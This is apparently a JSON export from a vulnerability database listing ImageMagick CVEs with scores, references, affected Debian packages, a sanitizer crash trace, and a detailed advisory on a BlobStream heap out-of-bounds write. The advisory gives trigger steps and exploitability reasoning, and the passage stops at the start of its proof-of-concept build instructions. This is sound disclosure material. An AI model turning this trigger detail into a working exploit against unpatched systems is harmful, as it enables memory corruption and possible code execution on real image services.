"https://nvd.nist.gov/vuln/detail/CVE-2025-62171", "reference_id": "CVE-2025-62171", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62171" }, { "reference_url": "https://github.com/advisories/GHSA-9pp9-cfwx-54rm", "reference_id": "GHSA-9pp9-cfwx-54rm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9pp9-cfwx-54rm" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm", "reference_id": "GHSA-9pp9-cfwx-54rm", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-17T17:05:36Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3058", "reference_id": "RHSA-2026:3058", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3058" }, { "reference_url": "https://usn.ubuntu.com/7876-1/", "reference_id": "USN-7876-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7876-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-62171", "GHSA-9pp9-cfwx-54rm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jtkv-nvan-jbag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20803?format=api", "vulnerability_id": "VCID-jvq6-xjbu-fkb9", "summary": "ImageMagick: Infinite loop vulnerability when parsing a PCD file\nWhen a PCD file does not contain a valid marker, the DecodeImage() function becomes trapped in an infinite loop while searching for the marker, causing the program to become unresponsive and continuously consume CPU resources, ultimately leading to system resource exhaustion and denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24485.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24485.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24485", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04849", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04815", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04674", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04666", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04698", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04715", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04733", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04742", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0473", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04682", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04696", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17962", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24485" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24485", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24485" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:48:11Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:48:11Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pqgj-2p96-rx85", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:48:11Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pqgj-2p96-rx85" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24485", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24485" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442091", "reference_id": "2442091", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442091" }, { "reference_url": "https://github.com/advisories/GHSA-pqgj-2p96-rx85", "reference_id": "GHSA-pqgj-2p96-rx85", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pqgj-2p96-rx85" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-24485", "GHSA-pqgj-2p96-rx85" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jvq6-xjbu-fkb9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21822?format=api", "vulnerability_id": "VCID-kefv-kpkk-wudf", "summary": "ImageMagick has Division-by-Zero in YUV sampling factor validation, which leads to crash\nA logic error in YUV sampling factor validation allows an invalid sampling factor to bypass checks and trigger a division-by-zero during image loading, resulting in a reliable denial-of-service.\n\n```\ncoders/yuv.c:210:47: runtime error: division by zero\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==3543373==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x55deeb4d723c bp 0x7fffc28d34d0 sp 0x7fffc28d3320 T0)\n #0 0x55deeb4d723c in ReadYUVImage coders/yuv.c:210\n #1 0x55deeb751dff in ReadImage MagickCore/constitute.c:743\n #2 0x55deeb756374 in ReadImages MagickCore/constitute.c:1082\n #3 0x55deec682375 in CLINoImageOperator MagickWand/operation.c:4959\n #4 0x55deec6887ed in CLIOption MagickWand/operation.c:5473\n #5 0x55deec32843b in ProcessCommandOptions MagickWand/magick-cli.c:653\n #6 0x55deec32b99b in MagickImageCommand MagickWand/magick-cli.c:1392\n #7 0x55deec324d58 in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x55deead82519 in MagickMain utilities/magick.c:162\n #9 0x55deead828be in main utilities/magick.c:193\n #10 0x7fb90807fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #11 0x7fb90807fe3f in __libc_start_main_impl ../csu/libc-start.c:392\n #12 0x55deead81974 in _start (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x22fb974)\n\nAddressSanitizer can not provide additional info.\nSUMMARY: AddressSanitizer: UNKNOWN SIGNAL coders/yuv.c:210 in ReadYUVImage\n==3543373==ABORTING\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25799.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25799.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25799", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05294", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05259", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05106", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05102", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05159", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05172", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05189", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05219", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05202", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05168", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05147", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19061", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25799" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25799", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25799" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/49000e7298fbfdd759ac2c46f740f40c2e9b7452", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/49000e7298fbfdd759ac2c46f740f40c2e9b7452" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-543g-8grm-9cw6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:22:05Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-543g-8grm-9cw6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25799", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25799" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442120", "reference_id": "2442120", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442120" }, { "reference_url": "https://github.com/advisories/GHSA-543g-8grm-9cw6", "reference_id": "GHSA-543g-8grm-9cw6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-543g-8grm-9cw6" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25799", "GHSA-543g-8grm-9cw6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kefv-kpkk-wudf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/25675?format=api", "vulnerability_id": "VCID-mxg1-261s-nbds", "summary": "ImageMagick BlobStream Forward-Seek Under-Allocation\n**Reporter:** Lumina Mescuwa \n**Product:** ImageMagick 7 (MagickCore) \n**Component:** `MagickCore/blob.c` (Blob I/O - BlobStream) \n**Tested:** 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI \n**Impact:** Heap out-of-bounds **WRITE** (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution \n\n---\n\n## Executive Summary\n\nFor memory-backed blobs (**BlobStream**), [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) permits advancing the stream **offset** beyond the current end without increasing capacity. The subsequent [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) then expands by **`quantum + length`** (amortized) instead of **`offset + length`**, and copies to `data + offset`. When `offset ≫ extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required.\n\n---\n\n## Affected Scope\n\n- **Versions confirmed:** 7.1.2-0, 7.1.2-1\n \n- **Architectures:** Observed on macOS arm64; architecture-agnostic on LP64\n \n- Paths: MagickCore blob subsystem — **BlobStream** ([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) and [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)).\n \n- **Not required:** External delegates; special policies; integer wraparound\n \n\n---\n\n## Technical Root Cause\n\n**Types (LP64):** \n`offset: MagickOffsetType` (signed 64-bit) \n`extent/length/quantum: size_t` (unsigned 64-bit) \n`data: unsigned char*`\n\n**Contract mismatch:**\n\n- [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) (BlobStream) updates `offset` to arbitrary positions, including past end, **without** capacity adjustment.\n \n- [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) tests `offset + length >= extent` and grows **by** `length + quantum`, doubles `quantum`, reallocates to `extent + 1`, then:\n \n ```\n q = data + (size_t)offset;\n memmove(q, src, length);\n ```\n \n There is **no guarantee** that `extent ≥ offset + length` post-growth. With `offset ≫ extent`, `q` is beyond the allocation.\n \n\n**Wrap-free demonstration:** \nInitialize `extent=1`, write one byte (`offset=1`), seek to `0x10000000` (256 MiB), then write 3–4 bytes. Growth remains << `offset + length`; the copy overruns the heap buffer.\n\n---\n\n## Exploitability & Reachability\n\n- **Primitive:** Controlled bytes written at a controlled displacement from the buffer base.\n \n- **Reachability:** Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract **permits** it, thus creating a latent sink for first- or third-party encoders/writers.\n \n- **Determinism:** Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.\n \n\n---\n\n## Impact Assessment\n\n- **Integrity:** High - adjacent object/metadata overwrite plausible.\n \n- **Availability:** High - reliably crashable (ASan and non-ASan).\n \n- **Confidentiality:** High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.\n \n- **RCE plausibility:** Typical of heap OOB writes in long-lived image services; allocator/layout dependent.\n \n\n---\n\n## CVSS v3.1 Rationale (9.8)\n\n- **AV:N / PR:N / UI:N** - server-side image processing is commonly network-reachable without auth or user action.\n \n- **AC:L** - a single forward seek + write suffices; no races or specialized state.\n \n- **S:U** - corruption localized to the ImageMagick process.\n \n- **C:H / I:H / A:H** - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).\n \n\n_Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._\n\n---\n\n## Violated Invariant\n\n> **Before copying `length` bytes at `offset`, enforce `extent ≥ offset + length` with overflow-checked arithmetic.**\n\nThe BlobStream growth policy preserves amortized efficiency but fails to enforce this **per-write** safety invariant.\n\n---\n\n## Remediation (Principle)\n\nIn [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) (BlobStream case):\n\n1. **Checked requirement:** \n `need = (size_t)offset + length;` → if `need < (size_t)offset`, overflow → fail.\n \n2. **Ensure capacity ≥ need:** \n `target = MagickMax(extent + quantum + length, need);` \n (Optionally loop, doubling `quantum`, until `extent ≥ need` to preserve amortization.)\n \n3. **Reallocate to `target + 1` before copying;** then perform the move.\n \n\n**Companion hardening (recommended):**\n\n- Document or restrict [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.\n \n- Centralize blob arithmetic in checked helpers.\n \n- Unit tests: forward-seek-then-write (success and overflow-reject).\n \n\n---\n\n## Regression & Compatibility\n\n- **Behavior change:** Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).\n \n- **Memory profile:** Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.\n \n\n---\n\n## Vendor Verification Checklist\n\n- Reproduce with a minimal in-memory BlobStream harness under ASan.\n \n- Apply fix; verify `extent ≥ offset + length` at all write sites.\n \n- Add forward-seek test cases (positive/negative).\n \n- Audit other growth sites (`SetBlobExtent`, stream helpers).\n \n- Clarify BlobStream seek semantics in documentation.\n \n- Unit test: forward seek to large offset on **BlobStream** followed by 1–8 byte writes; assert either growth to `need` or clean failure.\n \n\n---\n\n# PoC / Reproduction / Notes\n\n## Environment\n\n- **OS/Arch:** macOS 14 (arm64)\n \n- **Compiler:** clang-17 with AddressSanitizer\n \n- **ImageMagick:** Q16-HDRI\n \n- **Prefix:** `~/opt/im-7.1.2-0`\n \n- **`pkg-config`:** from PATH (no hard-coded `/usr/local/...`)\n \n\n---\n\n## Build ImageMagick 7.1.2-0 (static, minimal)\n\n```bash\n./configure --prefix=\"$HOME/opt/im-7.1.2-0\" --enable-hdri --with-quantum-depth=16 \\\n --disable-shared --enable-static --without-modules \\\n --without-magick-plus-plus --disable-openmp --without-perl 